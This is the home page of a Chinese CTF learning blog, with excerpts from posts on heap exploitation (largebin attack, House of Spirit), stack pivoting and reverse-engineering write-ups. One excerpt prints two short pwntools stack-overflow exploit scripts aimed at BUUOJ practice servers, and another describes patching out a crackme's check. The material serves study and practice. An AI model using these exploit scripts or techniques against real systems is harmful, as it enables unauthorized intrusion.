<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>Icey's Blog</title><meta name="author" content="1c3y"><meta name="copyright" content="1c3y"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="Welcome">
<meta property="og:type" content="website">
<meta property="og:title" content="Icey&#39;s Blog">
<meta property="og:url" content="http://example.com/index.html">
<meta property="og:site_name" content="Icey&#39;s Blog">
<meta property="og:description" content="Welcome">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://p.ananas.chaoxing.com/star3/origin/e79248a96a8b9a9f4c51e2e7beaabc5c.png">
<meta property="article:author" content="1c3y">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://p.ananas.chaoxing.com/star3/origin/e79248a96a8b9a9f4c51e2e7beaabc5c.png"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://example.com/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    jQuery: 'https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js',
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
    },
    fancybox: {
      js: 'https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js',
      css: 'https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = { 
  isPost: false,
  isHome: true,
  isHighlightShrink: false,
  isToc: false,
  postUpdate: '2021-03-28 18:52:49'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    })(window)</script><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="Icey's Blog" type="application/atom+xml">
</head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="author-avatar"><img class="avatar-img" src="http://p.ananas.chaoxing.com/star3/origin/e79248a96a8b9a9f4c51e2e7beaabc5c.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data"><div class="data-item is-center"><div class="data-item-link"><a href="/archives/"><div class="headline">文章</div><div class="length-num">7</div></a></div></div><div class="data-item is-center"><div class="data-item-link"><a href="/tags/"><div class="headline">标签</div><div class="length-num">3</div></a></div></div><div class="data-item is-center"><div class="data-item-link"><a href="/categories/"><div class="headline">分类</div><div class="length-num">2</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div></div></div></div><div class="page" id="body-wrap"><header class="full_page" id="page-header" style="background-image: url('https://i.loli.net/2021/03/21/JhuVsgKIZLMEniB.png')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Icey's Blog</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="site-info"><h1 id="site-title">Icey's Blog</h1></div><div id="scroll-down"><i class="fas fa-angle-down scroll-down-effects"></i></div></header><main class="layout" id="content-inner"><div class="recent-posts" id="recent-posts"><div class="recent-post-item"><div class="post_cover left_radius"><a href="/2021/03/28/Largebin%20attack%E5%AD%A6%E4%B9%A0/" title="Largebin attack学习">     <img class="post_bg" src="https://i.loli.net/2021/03/21/mLYCNvXPnutGfBI.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Largebin attack学习"></a></div><div class="recent-post-info"><a class="article-title" href="/2021/03/28/Largebin%20attack%E5%AD%A6%E4%B9%A0/" title="Largebin attack学习">Largebin attack学习</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2021-03-28T06:10:00.000Z" title="发表于 2021-03-28 14:10:00">2021-03-28</time></span><span class="article-meta"><span class="article-meta__separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%BC%8F%E6%B4%9E/">二进制漏洞</a></span></div><div class="content">Largebin分配流程概述
在一个chunk被插入unsorted bin后，当我们再去申请chunk时，会反向遍历unsorted bin的双向循环链表，如果没有匹配到合适的大小，则会将根据bin的大小，将其放置到对应的large bin或small bin
如果所需分配的chunk为largebin chunk，则会反向遍历largebin链表
找到第一个大于等于所需chunk大小的chunk退出循环
将其切分后判断其剩余大小，如果大于MINSIZE，则构成新的chunk放入unsorted bin中
largebin链表中chunk按从大到小排列

源码分析宏bin_at1234/* addressing -- note that bin_at(0) does not exist */#define bin_at(m, i) \  (mbinptr) (((char *) &amp;((m)-&gt;bins[((i) - 1) * 2]))			      \             - offsetof (struct malloc_chunk, fd))
宏bin_at( ...</div></div></div><div class="recent-post-item"><div class="post_cover right_radius"><a href="/2021/03/22/BUUOJ%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%E8%A1%A5%E6%A1%A31/" title="BUUOJ刷题记录补档-1">     <img class="post_bg" src="https://i.loli.net/2021/03/21/2lRt7MpyxaGS8u4.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="BUUOJ刷题记录补档-1"></a></div><div class="recent-post-info"><a class="article-title" href="/2021/03/22/BUUOJ%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%E8%A1%A5%E6%A1%A31/" title="BUUOJ刷题记录补档-1">BUUOJ刷题记录补档-1</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2021-03-22T13:19:00.000Z" title="发表于 2021-03-22 21:19:00">2021-03-22</time></span><span class="article-meta"><span class="article-meta__separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/CTF/">CTF</a></span></div><div class="content">前言上学期和寒假刷了一些题，但是因为懒没有全部记录下，现在分几篇博客慢慢补上，也当作回顾这篇的题应该都是很基础的，不详细写（偷懒）
0x1 warmup_csaw_2016常规栈溢出
123456from pwn import*p = remote(&#x27;node3.buuoj.cn&#x27;,&#x27;27790&#x27;)binsh_addr = 0x40060dpayload = &#x27;a&#x27;*(0x40+8) + p64(binsh_addr)p.sendline(payload)p.interactive()

0x2 pwn1_sctf_2016ret2text
123456from pwn import*p = remote(&#x27;node3.buuoj.cn&#x27;,&#x27;29973&#x27;)binsh_addr = 0x08048F0Dpayload = &#x27;I&#x27;*20 + &#x27;b&#x27;*4 + p32(binsh_addr)p.sendline(payload)p.interactive( ...</div></div></div><div class="recent-post-item"><div class="post_cover left_radius"><a href="/2021/03/20/House%20of%20Spirit%E5%AD%A6%E4%B9%A0/" title="House of Spirit学习">     <img class="post_bg" src="https://i.loli.net/2021/03/21/pB2PXv3LnAsYNMO.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="House of Spirit学习"></a></div><div class="recent-post-info"><a class="article-title" href="/2021/03/20/House%20of%20Spirit%E5%AD%A6%E4%B9%A0/" title="House of Spirit学习">House of Spirit学习</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2021-03-20T06:49:00.000Z" title="发表于 2021-03-20 14:49:00">2021-03-20</time></span><span class="article-meta"><span class="article-meta__separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%BC%8F%E6%B4%9E/">二进制漏洞</a></span></div><div class="content">前置知识House of Spirit是组合型的漏洞利用，它是指针覆盖和堆管理机制的组合利用。该技术的核心在于在目标位置处伪造fastbin chunk，并将其释放，从而达到分配指定地址的chunk的目的。要构造fastbin fake chunk，并且将其释放时，可以将其放入到对应的fastbin链表中，需要绕过一些必要的检测，即：

fake chunk 的 ISMMAP 位不能为1，因为 free 时，如果是 mmap 的 chunk，会单独处理。
fake chunk 地址需要对齐， MALLOC_ALIGN_MASK
fake chunk 的 size 大小需要满足对应的 fastbin 的需求，同时也得对齐。
fake chunk 的 next chunk 的大小不能小于 2 * SIZE_SZ，同时也不能大于av-&gt;system_mem 。
fake chunk 对应的 fastbin 链表头部不能是该 fake chunk，即不能构成 double free 的情况。


利用场景
想要利用的目标区域的前段空间和后段空间都是可控的区域。一般来说想要控制的区域多为返 ...</div></div></div><div class="recent-post-item"><div class="post_cover right_radius"><a href="/2021/03/14/%5BV&amp;N2020%20%E5%85%AC%E5%BC%80%E8%B5%9B%5DsimpleHeap/" title="V&amp;N2020 公开赛 simpleHeap">     <img class="post_bg" src="https://i.loli.net/2021/03/21/1WR5tiS8lsc9wXb.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="V&amp;N2020 公开赛 simpleHeap"></a></div><div class="recent-post-info"><a class="article-title" href="/2021/03/14/%5BV&amp;N2020%20%E5%85%AC%E5%BC%80%E8%B5%9B%5DsimpleHeap/" title="V&amp;N2020 公开赛 simpleHeap">V&amp;N2020 公开赛 simpleHeap</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2021-03-14T01:27:00.000Z" title="发表于 2021-03-14 09:27:00">2021-03-14</time></span><span class="article-meta"><span class="article-meta__separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/CTF/">CTF</a></span></div><div class="content">这一题涉及到的知识点比较多，包括off-by-one，unsorted_bin attach和fast_bin attach，还有通过使用realloc调整栈帧来使one_gadget满足条件。
静态分析安全检查保护全开，按目前学习的体会，大概就是要伪造fake chunk来修改malloc_hook。
IDA反汇编分析完整的菜单，有添加、编辑、打印和删除四个功能
add函数：先读入size，然后对size有大小的检查，通过检查会将分配chunk的malloc指针赋给chunk_list数组。然后将size的值存入size_list数组中，并读入内容。
edit函数重点在my_read函数，在这里存在off-by-one漏洞：在i和a2大小的比较那里应该是i&gt;=a2，否则编辑时会多写入一个字符，造成off-by-one
show函数简单的打印
delete函数将chunk释放后，将malloc指针置空，同时size大小置为0
利用思路利用off-by-one漏洞修改堆块大小，实现overlapping，然后释放到unsorted bin中由于此时unsorted bin中只有一个 ...</div></div></div><div class="recent-post-item"><div class="post_cover left_radius"><a href="/2021/02/07/ciscn_2019_es_2/" title="ciscn_2019_es_2">     <img class="post_bg" src="https://i.loli.net/2021/03/21/y2xBT68QnRUC3O9.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="ciscn_2019_es_2"></a></div><div class="recent-post-info"><a class="article-title" href="/2021/02/07/ciscn_2019_es_2/" title="ciscn_2019_es_2">ciscn_2019_es_2</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2021-02-07T06:59:00.000Z" title="发表于 2021-02-07 14:59:00">2021-02-07</time></span><span class="article-meta"><span class="article-meta__separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/CTF/">CTF</a></span></div><div class="content">这题涉及的知识点是栈迁移。关于栈迁移，贴一篇师傅的博文：[原创]栈迁移原理（图示)，讲的很好。
Solution0x1先查看防护
0x2IDA打开，进到vul函数，反汇编代码如下：
12345678910int vul()&#123;  char s; // [esp+0h] [ebp-28h]  memset(&amp;s, 0, 0x20u);  read(0, &amp;s, 0x30u);  printf(&quot;Hello, %s\n&quot;, &amp;s);  read(0, &amp;s, 0x30u);  return printf(&quot;Hello, %s\n&quot;, &amp;s);&#125;
可以看到read函数存在栈溢出，s距离ebp为0x28，而read只能读入0x30，可以溢出0x30-0x28=0x8个字节，也就是正好覆盖edb和ret。溢出距离不足以构造常规的ROP链，需要利用栈迁移的技巧将栈劫持到我们指定的地址。再审计代码，发现printf函数可以用来泄露栈上的内容，因为memset为s分配了0x20的空间，并全部以\x00进行 ...</div></div></div><div class="recent-post-item"><div class="post_cover right_radius"><a href="/2021/01/25/get_started_3dsctf_2016/" title="get_started_3dsctf_2016">     <img class="post_bg" src="https://i.loli.net/2021/03/21/FpLYGZ5oVaXI4s9.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="get_started_3dsctf_2016"></a></div><div class="recent-post-info"><a class="article-title" href="/2021/01/25/get_started_3dsctf_2016/" title="get_started_3dsctf_2016">get_started_3dsctf_2016</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2021-01-25T15:38:00.000Z" title="发表于 2021-01-25 23:38:00">2021-01-25</time></span><span class="article-meta"><span class="article-meta__separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/CTF/">CTF</a></span></div><div class="content">今天做的这道3dctf的get_started，感觉很有意思，而且其中的一些知识点和做题方法很有必要做一下记录，以便日后回顾。
Solution这道题有两种做法，一种是直接利用栈溢出传入对应的参数并使用exit强制退出实现flag的回显，另一种是通过mprotect修改内存并写入shellcode。
0x1先安全检查，只开启了栈不可执行
IDA反汇编进行分析,溢出点在gets函数
另外还给了我们后门函数get_flag
这里我们需要利用gets进行栈溢出，先查看栈帧结构偏移量是0x38,这里有点奇怪的是没有ebp。先提一下call指令，在执行call指令时，进行两步操作：1）将当前的IP或CS压入栈中2）转移即
1call = push + jmp
因此我们在栈溢出ret到get_flag函数后，按照函数栈帧的结构，还需将get_flag函数的返回地址入栈。由于函数栈的结构是参数位于返回地址之上，因此payload的组成就是：
123payload = padding1 + getflag_addr + ret_addr + a1 + a2# a1 = 0x308CD64F 参数传入时 ...</div></div></div><div class="recent-post-item"><div class="post_cover left_radius"><a href="/2020/11/29/WriteUp/" title="SCUCTF2020 新生赛">     <img class="post_bg" src="https://i.loli.net/2021/03/21/OVXUobe5qvlNM4G.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="SCUCTF2020 新生赛"></a></div><div class="recent-post-info"><a class="article-title" href="/2020/11/29/WriteUp/" title="SCUCTF2020 新生赛">SCUCTF2020 新生赛</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2020-11-28T16:47:00.000Z" title="发表于 2020-11-29 00:47:00">2020-11-29</time></span><span class="article-meta"><span class="article-meta__separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/CTF/">CTF</a></span></div><div class="content">SCUCTF赛后的一点小小记录…
Reverse1.easyF5
扔进IDA,然后F5得到flag:


2.easypack扔进exeinfope,发现有upx壳

直接kali脱壳

在OD打开

然后右键-&gt;中文搜索引擎-&gt;智能搜索,然后在输入语句后一句双击进入

Jnz处F2下断点,F9运行

随便输入一串验证码

回车后得到flag


3.pytrade把pyc文件进行python反编译

将flag_base64进行base64解密,得到flag


4.crackmeOD运行,然后右键-&gt;中文搜索引擎-&gt;智能搜索,双击选中error进入

选中输入验证码跳转处

顺着红线找到跳转开始处

将其nop掉

选中刚才用NOP填充的代码段,右键单击“复制到可执行文件”—-“选择”,在新弹出的界面上点击右键–单击“保存文件”,然后选择保存路径和文件名即可。
打开刚保存的文件,破解成功


5.maze扔进IDA,F5查看main函数伪代码

分析程序可以知道,要救出马老师,需要走15步

进一步分析,发现输入的路径需要包括‘D’(ascii码值:68)、 ...</div></div></div><nav id="pagination"><div class="pagination"><span class="page-number current">1</span></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="card-info-avatar is-center"><img class="avatar-img" src="http://p.ananas.chaoxing.com/star3/origin/e79248a96a8b9a9f4c51e2e7beaabc5c.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/><div class="author-info__name">1c3y</div><div class="author-info__description">Welcome</div></div><div class="card-info-data"><div class="card-info-data-item is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">7</div></a></div><div class="card-info-data-item is-center"><a href="/tags/"><div class="headline">标签</div><div class="length-num">3</div></a></div><div class="card-info-data-item is-center"><a href="/categories/"><div class="headline">分类</div><div class="length-num">2</div></a></div></div><a class="button--animated" id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xxxxxx"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn card-announcement-animation"></i><span>公告</span></div><div class="announcement_content">This is my Blog</div></div><div class="sticky_layout"><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2021/03/28/Largebin%20attack%E5%AD%A6%E4%B9%A0/" title="Largebin attack学习"><img src="https://i.loli.net/2021/03/21/mLYCNvXPnutGfBI.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Largebin attack学习"/></a><div class="content"><a class="title" href="/2021/03/28/Largebin%20attack%E5%AD%A6%E4%B9%A0/" title="Largebin attack学习">Largebin attack学习</a><time datetime="2021-03-28T06:10:00.000Z" title="发表于 2021-03-28 14:10:00">2021-03-28</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2021/03/22/BUUOJ%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%E8%A1%A5%E6%A1%A31/" title="BUUOJ刷题记录补档-1"><img src="https://i.loli.net/2021/03/21/2lRt7MpyxaGS8u4.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="BUUOJ刷题记录补档-1"/></a><div class="content"><a class="title" href="/2021/03/22/BUUOJ%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%E8%A1%A5%E6%A1%A31/" title="BUUOJ刷题记录补档-1">BUUOJ刷题记录补档-1</a><time datetime="2021-03-22T13:19:00.000Z" title="发表于 2021-03-22 21:19:00">2021-03-22</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2021/03/20/House%20of%20Spirit%E5%AD%A6%E4%B9%A0/" title="House of Spirit学习"><img src="https://i.loli.net/2021/03/21/pB2PXv3LnAsYNMO.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="House of Spirit学习"/></a><div class="content"><a class="title" href="/2021/03/20/House%20of%20Spirit%E5%AD%A6%E4%B9%A0/" title="House of Spirit学习">House of Spirit学习</a><time datetime="2021-03-20T06:49:00.000Z" title="发表于 2021-03-20 14:49:00">2021-03-20</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2021/03/14/%5BV&amp;N2020%20%E5%85%AC%E5%BC%80%E8%B5%9B%5DsimpleHeap/" title="V&amp;N2020 公开赛 simpleHeap"><img src="https://i.loli.net/2021/03/21/1WR5tiS8lsc9wXb.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="V&amp;N2020 公开赛 simpleHeap"/></a><div class="content"><a class="title" href="/2021/03/14/%5BV&amp;N2020%20%E5%85%AC%E5%BC%80%E8%B5%9B%5DsimpleHeap/" title="V&amp;N2020 公开赛 simpleHeap">V&amp;N2020 公开赛 simpleHeap</a><time datetime="2021-03-14T01:27:00.000Z" title="发表于 2021-03-14 09:27:00">2021-03-14</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2021/02/07/ciscn_2019_es_2/" title="ciscn_2019_es_2"><img src="https://i.loli.net/2021/03/21/y2xBT68QnRUC3O9.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="ciscn_2019_es_2"/></a><div class="content"><a class="title" href="/2021/02/07/ciscn_2019_es_2/" title="ciscn_2019_es_2">ciscn_2019_es_2</a><time datetime="2021-02-07T06:59:00.000Z" title="发表于 2021-02-07 14:59:00">2021-02-07</time></div></div></div></div><div class="card-widget card-categories"><div class="item-headline">
            <i class="fas fa-folder-open"></i>
            <span>分类</span>
            
            </div>
            <ul class="card-category-list" id="aside-cat-list">
            <li class="card-category-list-item "><a class="card-category-list-link" href="/categories/CTF/"><span class="card-category-list-name">CTF</span><span class="card-category-list-count">5</span></a></li><li class="card-category-list-item "><a class="card-category-list-link" href="/categories/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%BC%8F%E6%B4%9E/"><span class="card-category-list-name">二进制漏洞</span><span class="card-category-list-count">2</span></a></li>
            </ul></div><div class="card-widget card-tags"><div class="item-headline"><i class="fas fa-tags"></i><span>标签</span></div><div class="card-tag-cloud"><a href="/tags/BUUCTF/" style="font-size: 1.3em; color: #99a1ac">BUUCTF</a> <a href="/tags/how2heap/" style="font-size: 1.1em; color: #999">how2heap</a> <a href="/tags/pwn/" style="font-size: 1.5em; color: #99a9bf">pwn</a></div></div><div class="card-widget card-archives"><div class="item-headline"><i class="fas fa-archive"></i><span>归档</span></div><ul class="card-archive-list"><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2021/03/"><span class="card-archive-list-date">三月 2021</span><span class="card-archive-list-count">4</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2021/02/"><span class="card-archive-list-date">二月 2021</span><span class="card-archive-list-count">1</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2021/01/"><span class="card-archive-list-date">一月 2021</span><span class="card-archive-list-count">1</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2020/11/"><span class="card-archive-list-date">十一月 2020</span><span class="card-archive-list-count">1</span></a></li></ul></div><div class="card-widget card-webinfo"><div class="item-headline"><i class="fas fa-chart-line"></i><span>网站资讯</span></div><div class="webinfo"><div class="webinfo-item"><div class="item-name">文章数目 :</div><div class="item-count">7</div></div><div class="webinfo-item"><div class="item-name">本站访客数 :</div><div class="item-count" id="busuanzi_value_site_uv"></div></div><div class="webinfo-item"><div class="item-name">本站总访问量 :</div><div class="item-count" id="busuanzi_value_site_pv"></div></div><div class="webinfo-item"><div class="item-name">最后更新时间 :</div><div class="item-count" id="last-push-date" data-lastPushDate="2021-03-28T10:52:49.233Z"></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2021 By 1c3y</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><div class="js-pjax"></div><script defer="defer" id="fluttering_ribbon" mobile="true" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/canvas-fluttering-ribbon.min.js"></script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>